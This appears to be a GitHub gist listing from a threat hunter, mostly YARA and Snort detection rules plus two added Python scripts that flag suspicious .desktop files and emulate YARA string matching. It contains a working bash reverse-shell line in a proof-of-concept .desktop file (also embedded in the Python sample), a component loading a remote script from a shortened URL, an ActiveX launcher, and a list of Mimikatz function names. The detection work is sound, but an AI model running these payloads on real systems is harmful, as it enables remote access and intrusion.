Nick Carr itsreallynick

itsreallynick / installutilpayload.yar (last active Nov 19, 2019)
Making this rule public
rule Hunting_InstallUtil_ProbablePayload
{
    meta:
        author = "Nick Carr - @itsreallynick"
        description = "2019-05-22 - Focusing on the underlying structure that largely cannot change outside of obfuscation"
    strings:
        $installutil = "System.Configuration.Install" nocase ascii wide
        $override_func1 = "public override string HelpText" nocase ascii wide
        $override_func2 = "public override void Uninstall" nocase ascii wide
        $override_func3 = "public override void Install" nocase ascii wide
itsreallynick / poc.desktop
[Desktop Entry]
Name=GoShortcutItsYourEpoch
Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
Icon=http://bit.ly/icon-png
Terminal=false
Type=Application
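A triage script for .desktop files in the shape of the entry above, added here as an example and not part of the gist: it splits Exec into argv the way a launcher would, then flags the traits a defender would hunt for (argv[0] is a shell, a /dev/tcp or /dev/udp target, bare redirection tokens, a remote Icon URL, and a shell launched with Terminal=false). The two sample entries are constructed for the example; the finding names and the shell list are my own.

```python
import configparser
import os
import re
import shlex
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample in the shape of the poc.desktop gist above (not the gist file itself).
POC_DESKTOP = """[Desktop Entry]
Name=GoShortcutItsYourEpoch
Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
Icon=http://bit.ly/icon-png
Terminal=false
Type=Application
"""

# Constructed benign entry for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
Type=Application
"""

# Assumed list of interpreters worth flagging as argv[0] of an Exec line.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "fish"}
# A whole Exec argument that is only a shell redirection or pipe token: ">&", "0>&1", "2>&1", "|", "<".
REDIRECT_RE = re.compile(r"\d*(?:>{1,2}&?|<&?|\|)\d*")


def analyze_desktop_entry(text: str) -> Dict[str, object]:
    """Parse a .desktop file and return its name, the Exec argv and a list of findings."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # .desktop keys are case-sensitive; keep "Exec", "Icon" as written
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return {"name": "", "argv": [], "findings": ["no_desktop_entry_group"]}
    entry = cp["Desktop Entry"]

    exec_line = entry.get("Exec", "")
    # The spec's quoting rules are close enough to POSIX shell quoting for shlex to split argv;
    # note that ">&" and "0>&1" survive as ordinary arguments, because Exec is not shell-parsed.
    argv: List[str] = shlex.split(exec_line) if exec_line else []

    findings: List[str] = []
    if argv and os.path.basename(argv[0]) in SHELLS:
        findings.append("exec_is_shell")
    if any("/dev/tcp/" in a or "/dev/udp/" in a for a in argv):
        findings.append("exec_dev_tcp_socket")
    if any(REDIRECT_RE.fullmatch(a) for a in argv):
        findings.append("exec_shell_redirection")
    if urlparse(entry.get("Icon", "")).scheme in ("http", "https", "ftp"):
        findings.append("icon_remote_url")  # icon fetch doubles as a beacon
    if "exec_is_shell" in findings and entry.get("Terminal", "false").strip().lower() == "false":
        findings.append("shell_without_terminal")  # interactive shell with no visible window
    return {"name": entry.get("Name", ""), "argv": argv, "findings": findings}


if __name__ == "__main__":
    for label, text in (("poc", POC_DESKTOP), ("benign", BENIGN_DESKTOP)):
        result = analyze_desktop_entry(text)
        print(label, result["argv"], result["findings"])
```

The Desktop Entry specification defines Exec as an argv line with its own quoting rules, not a shell command, so whether redirections like these actually open a socket depends on how a given launcher hands the line to bash; the check flags the tokens regardless, since no legitimate entry carries them.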
itsreallynick / dailyworkflow.yar (created Oct 24, 2019)
Workflow.Compiler rules from August 2018
// Background:
rule Hunting_Workflow_Collection_XOML {
    meta:
        author = "Nick Carr - @itsreallynick"
    strings:
        $workflow1 = "<SequentialWorkflowActivity" nocase ascii wide
        $workflow2 = "Code" nocase ascii wide
    condition:
        uint16(0) != 0x5A4D and all of ($workflow*) and new_file
itsreallynick / gen_URLpersistence.yar (last active Oct 17, 2019)
Yara rules for .url tricks that didn't fit in a tweet
rule Methodology_Suspicious_Shortcut_Local_URL
{
    meta:
        author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
        description = "Detects local script usage for .URL persistence"
        reference = "https://twitter.com/cglyer/status/1176184798248919044"
    strings:
        $file = "URL=file:///" nocase
        $url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
        $url_explicit = "[InternetShortcut]" nocase
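The three hunting rules on this page (installutilpayload.yar, dailyworkflow.yar and gen_URLpersistence.yar) lean on the same YARA features: the `ascii`/`wide`/`nocase` string modifiers and a `uint16(0) != 0x5A4D` guard that excludes PE files. The script below is an added example, not the author's code and not a YARA engine: it emulates those modifiers as bytes regexes (`wide` is the UTF-16LE form, `nocase` folds ASCII letters, which is also what YARA does for wide text) and runs the three rules over constructed samples. The gist previews cut off before the conditions of the InstallUtil and .URL rules, so the conditions used for those two are assumptions and are marked as such; the XOML rule's `new_file` external variable is not modelled. The four sample blobs are constructed for the example and are not real malware.

```python
import codecs
import re
from typing import Callable, Dict, List, Tuple

Matches = Dict[str, bool]


def yara_text(s: str, nocase: bool = False, ascii_: bool = True, wide: bool = False) -> re.Pattern:
    """Compile a bytes regex equivalent to a YARA text string with the given modifiers."""
    forms = []
    if ascii_:
        forms.append(re.escape(s.encode("ascii")))          # raw bytes
    if wide:
        forms.append(re.escape(s.encode("utf-16-le")))      # each ASCII char followed by NUL
    # re.IGNORECASE on a bytes pattern folds ASCII letters only, which is YARA's nocase behaviour.
    return re.compile(b"(?:" + b"|".join(forms) + b")", re.IGNORECASE if nocase else 0)


def uint16(data: bytes, offset: int):
    """YARA's uint16(offset): little-endian. A read past the end is undefined, and an
    undefined value makes the whole condition false, so None is returned for it."""
    return int.from_bytes(data[offset:offset + 2], "little") if len(data) >= offset + 2 else None


def cond_installutil(m: Matches, data: bytes) -> bool:
    # Assumed condition: the gist preview stops before the real one.
    return all(m.values())


def cond_xoml(m: Matches, data: bytes) -> bool:
    # From the gist: uint16(0) != 0x5A4D and all of ($workflow*) and new_file.
    # `new_file` is an external variable of the author's pipeline and is not modelled here.
    magic = uint16(data, 0)
    return magic is not None and magic != 0x5A4D and all(m.values())


def cond_local_url(m: Matches, data: bytes) -> bool:
    # Assumed condition (preview truncated): explicit InternetShortcut whose target is a local file.
    return m["$url_explicit"] and m["$file"]


RULES: Dict[str, Tuple[Dict[str, re.Pattern], Callable[[Matches, bytes], bool]]] = {
    "Hunting_InstallUtil_ProbablePayload": ({
        "$installutil": yara_text("System.Configuration.Install", nocase=True, wide=True),
        "$override_func1": yara_text("public override string HelpText", nocase=True, wide=True),
        "$override_func2": yara_text("public override void Uninstall", nocase=True, wide=True),
        "$override_func3": yara_text("public override void Install", nocase=True, wide=True),
    }, cond_installutil),
    "Hunting_Workflow_Collection_XOML": ({
        "$workflow1": yara_text("<SequentialWorkflowActivity", nocase=True, wide=True),
        "$workflow2": yara_text("Code", nocase=True, wide=True),
    }, cond_xoml),
    "Methodology_Suspicious_Shortcut_Local_URL": ({
        "$file": yara_text("URL=file:///", nocase=True),
        "$url_clsid": yara_text("[{000214A0-0000-0000-C000-000000000046}]"),
        "$url_explicit": yara_text("[InternetShortcut]", nocase=True),
    }, cond_local_url),
}


def scan(data: bytes) -> List[str]:
    """Return the names of the rules whose condition holds for `data`."""
    hits = []
    for name, (strings, condition) in RULES.items():
        matches = {ident: pat.search(data) is not None for ident, pat in strings.items()}
        if condition(matches, data):
            hits.append(name)
    return hits


# Constructed samples (not real malware).
# 1. C# source for an InstallUtil-launched payload: the overrides are plain ASCII text.
CS_INSTALLER_SOURCE = b"""using System.Collections;
using System.Configuration.Install;
[System.ComponentModel.RunInstaller(true)]
public class Sample : Installer {
    public override string HelpText { get { return ""; } }
    public override void Install(IDictionary state) { }
    public override void Uninstall(IDictionary state) { }
}
"""
# 2. A XOML workflow saved as UTF-16LE with BOM: only the `wide` form of the strings is present.
XOML_UTF16 = codecs.BOM_UTF16_LE + (
    '<SequentialWorkflowActivity x:Class="Run" x:Name="Run">'
    '<CodeActivity x:Name="Code1" ExecuteCode="Run_ExecuteCode" />'
    '</SequentialWorkflowActivity>'
).encode("utf-16-le")
# 3. The same markup inside a PE-looking blob: the strings match, but uint16(0) == 0x5A4D ("MZ").
MZ_WITH_XOML_STRINGS = b"MZ\x90\x00" + b"\x00" * 60 + b"<SequentialWorkflowActivity><CodeActivity/></SequentialWorkflowActivity>"
# 4. An Internet Shortcut pointing at a local script, the persistence trick the .URL rule targets.
URL_FILE = (b"[InternetShortcut]\r\nURL=file:///C:/Users/Public/stage.js\r\nIconIndex=0\r\n"
            b"[{000214A0-0000-0000-C000-000000000046}]\r\nProp3=19,2\r\n")

if __name__ == "__main__":
    for label, blob in (("cs", CS_INSTALLER_SOURCE), ("xoml", XOML_UTF16),
                        ("mz", MZ_WITH_XOML_STRINGS), ("url", URL_FILE)):
        print(label, scan(blob))
```

The MZ sample is the point of the `uint16(0)` guard: the same strings inside a compiled binary are a different hunting problem, so the rule refuses to fire on PE files even though both strings are present.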
itsreallynick / mimistack
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output
itsreallynick / keybase.md

Keybase proof

I hereby claim:

  • I am itsreallynick on github.
  • I am itsreallynick (https://keybase.io/itsreallynick) on keybase.
  • I have a public key ASDBI4S7vhTSnA-yeUaMckHjZTAVTcOo8qpkRA1h9UCz_wo

To claim this, I am signing this object:

itsreallynick / calc.lol
<component><script src="http://goo.gl/fxtJVt"></script></component>
itsreallynick / itsreallycalc
var itsreallycalc = new ActiveXObject("WScript.Shell").Run("calc.exe");
itsreallynick / help_Elm0d.yara (last active Aug 30, 2017)
Elm0d the Researcher
rule help_Elm0d
{
    meta:
        author = "@ItsReallyNick - Nick Carr"
        description = "We are STILL helping https://twitter.com/Elm0D find his files"
        reference = "https://twitter.com/ItsReallyNick/status/902702954272223232"
    strings:
        $elm0d = /[^a-z0-9]elm0d[^a-z0-9]/ nocase ascii wide
        $lol_infra = "iso9001-certificare.ro" nocase ascii wide
        $lol_website = "www.elm0d.tk" nocase ascii wide
itsreallynick / confession.rules (created Apr 7, 2017)
They made me find you. They made me
# Detecting client or server guilt
alert icmp any any -> any any (msg:"Suspected Terrifying Confession"; content:"They made me"; pcre:"/(They made me (do|bop|twist|pull) it\.){60,}/i"; reference:url,https://twitter.com/ItsReallyNick/status/849641156153442305; sid:646965; rev:1;)